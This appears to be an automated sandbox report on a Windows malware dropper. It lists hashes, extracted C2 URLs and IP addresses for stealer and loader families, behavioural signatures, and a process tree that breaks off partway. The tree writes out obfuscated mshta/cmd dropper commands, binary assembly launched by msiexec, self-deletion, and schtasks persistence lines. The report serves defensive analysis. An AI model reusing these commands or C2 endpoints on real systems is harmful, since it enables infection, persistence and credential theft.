Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    229s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    22-10-2021 14:38

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

916

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    916

Extracted

Family

vidar

Version

41.5

Botnet

937

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    937

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.1

Botnet

874dee7d322070fc6dc34b3b6cd43904077db44d

Attributes
  • url4cnc

    https://telete.in/isuzoShadowhunter

rc4.plain
rc4.plain

Extracted

Family

redline

C2

205.185.119.191:60857

Extracted

Family

raccoon

Botnet

7c9b4504a63ed23664e38808e65948379b790395

Attributes
  • url4cnc

    http://telegka.top/capibar

    http://telegin.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.5

Botnet

921

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

james222

C2

135.181.129.119:4805

Extracted

Family

icedid

Campaign

1875681804

Extracted

Family

djvu

C2

http://rlrz.org/lancer

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 60 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 29 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 16 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 25 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 7 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry class 48 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
    "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:692
    • C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe
      "C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1808
    • C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe
      "C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe"
      2⤵
      • Executes dropped EXE
      PID:2076
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        PID:4732
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
          4⤵
            PID:4672
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im build.exe /f
              5⤵
              • Kills process with taskkill
              PID:5784
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 6
              5⤵
              • Delays execution with timeout.exe
              PID:3304
      • C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe
        "C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe
          "C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:2524
      • C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe
        "C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:1396
        • C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe
          "C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"
          3⤵
          • Executes dropped EXE
          PID:4580
      • C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe
        "C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2520
        • C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe
          "C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe"
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:4012
          • C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe
            "C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe"
            4⤵
            • Executes dropped EXE
            PID:1480
          • C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe
            "C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe"
            4⤵
            • Executes dropped EXE
            PID:5156
          • C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe
            "C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe"
            4⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:5124
          • C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe
            "C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"
            4⤵
            • Executes dropped EXE
            • Checks whether UAC is enabled
            PID:3740
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
              5⤵
              • Checks whether UAC is enabled
              PID:2212
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ) do taskkill -f -iM "%~NxM"
                6⤵
                  PID:5432
                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    PID:3872
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                      8⤵
                      • Checks whether UAC is enabled
                      • Modifies Internet Explorer settings
                      PID:4744
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                        9⤵
                          PID:4208
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                        8⤵
                        • Checks whether UAC is enabled
                        PID:4724
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                          9⤵
                            PID:4032
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                              10⤵
                                PID:5060
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                10⤵
                                  PID:4372
                                • C:\Windows\SysWOW64\msiexec.exe
                                  msiexec -Y ..\lXQ2g.WC
                                  10⤵
                                  • Loads dropped DLL
                                  PID:6288
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill -f -iM "z43qKkeelVhYZeo9SP_z8aeG.exe"
                            7⤵
                            • Kills process with taskkill
                            PID:888
                    • C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe
                      "C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe"
                      4⤵
                        PID:3392
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im chrome.exe
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4376
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            6⤵
                              PID:4660
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              6⤵
                              • Kills process with taskkill
                              PID:5696
                        • C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe
                          "C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe" /mixtwo
                          4⤵
                          • Executes dropped EXE
                          PID:828
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 652
                            5⤵
                            • Program crash
                            PID:4152
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 664
                            5⤵
                            • Program crash
                            PID:5468
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 628
                            5⤵
                            • Program crash
                            PID:5604
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 684
                            5⤵
                            • Program crash
                            PID:5728
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 884
                            5⤵
                            • Program crash
                            PID:4108
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 932
                            5⤵
                            • Program crash
                            PID:3756
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 1104
                            5⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            PID:4192
                        • C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe
                          "C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:6044
                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:5688
                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                              6⤵
                                PID:4764
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee0
                                  7⤵
                                    PID:7272
                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff7359f9e70,0x7ff7359f9e80,0x7ff7359f9e90
                                      8⤵
                                        PID:7428
                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,16477206392915712665,5483262561208560081,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4764_1068618917" --mojo-platform-channel-handle=1772 /prefetch:8
                                      7⤵
                                        PID:7940
                                • C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5180
                                  • C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp" /SL5="$102B6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks whether UAC is enabled
                                    PID:6124
                                    • C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe
                                      "C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe" /S /UID=2709
                                      6⤵
                                        PID:5796
                                        • C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe
                                          "C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe" /VERYSILENT
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4312
                                        • C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe
                                          "C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1268
                                        • C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe
                                          "C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:5680
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive & exit
                                            8⤵
                                              PID:2696
                                              • C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe
                                                C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive
                                                9⤵
                                                • Executes dropped EXE
                                                PID:6544
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 652
                                                  10⤵
                                                  • Program crash
                                                  PID:6816
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 672
                                                  10⤵
                                                  • Program crash
                                                  PID:1512
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 676
                                                  10⤵
                                                  • Program crash
                                                  PID:6412
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 588
                                                  10⤵
                                                  • Program crash
                                                  PID:6928
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654" & exit
                                              8⤵
                                                PID:5556
                                                • C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654"
                                                  9⤵
                                                    PID:6552
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                      10⤵
                                                        PID:6752
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe & exit
                                                    8⤵
                                                      PID:6240
                                                      • C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe
                                                        C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe
                                                        9⤵
                                                          PID:7148
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive & exit
                                                        8⤵
                                                          PID:6592
                                                          • C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe
                                                            C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive
                                                            9⤵
                                                              PID:6956
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 652
                                                                10⤵
                                                                • Program crash
                                                                PID:1512
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 668
                                                                10⤵
                                                                • Program crash
                                                                PID:5496
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 672
                                                                10⤵
                                                                • Program crash
                                                                PID:6148
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 668
                                                                10⤵
                                                                • Program crash
                                                                PID:2320
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 884
                                                                10⤵
                                                                • Program crash
                                                                PID:5720
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 1096
                                                                10⤵
                                                                • Program crash
                                                                PID:4504
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent & exit
                                                            8⤵
                                                              PID:6900
                                                              • C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe
                                                                C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent
                                                                9⤵
                                                                  PID:6108
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe" & del C:\ProgramData\*.dll & exit
                                                                    10⤵
                                                                      PID:3524
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im FastPC.exe /f
                                                                        11⤵
                                                                        • Kills process with taskkill
                                                                        PID:7804
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 6
                                                                        11⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:8652
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S & exit
                                                                  8⤵
                                                                    PID:7048
                                                                    • C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S
                                                                      9⤵
                                                                        PID:4408
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9104.tmp\tempfile.ps1"
                                                                          10⤵
                                                                            PID:7668
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:2460
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:808
                                                          • C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1184
                                                          • C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            PID:2120
                                                          • C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Drops file in Program Files directory
                                                            PID:2060
                                                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:4824
                                                            • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4868
                                                            • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                              3⤵
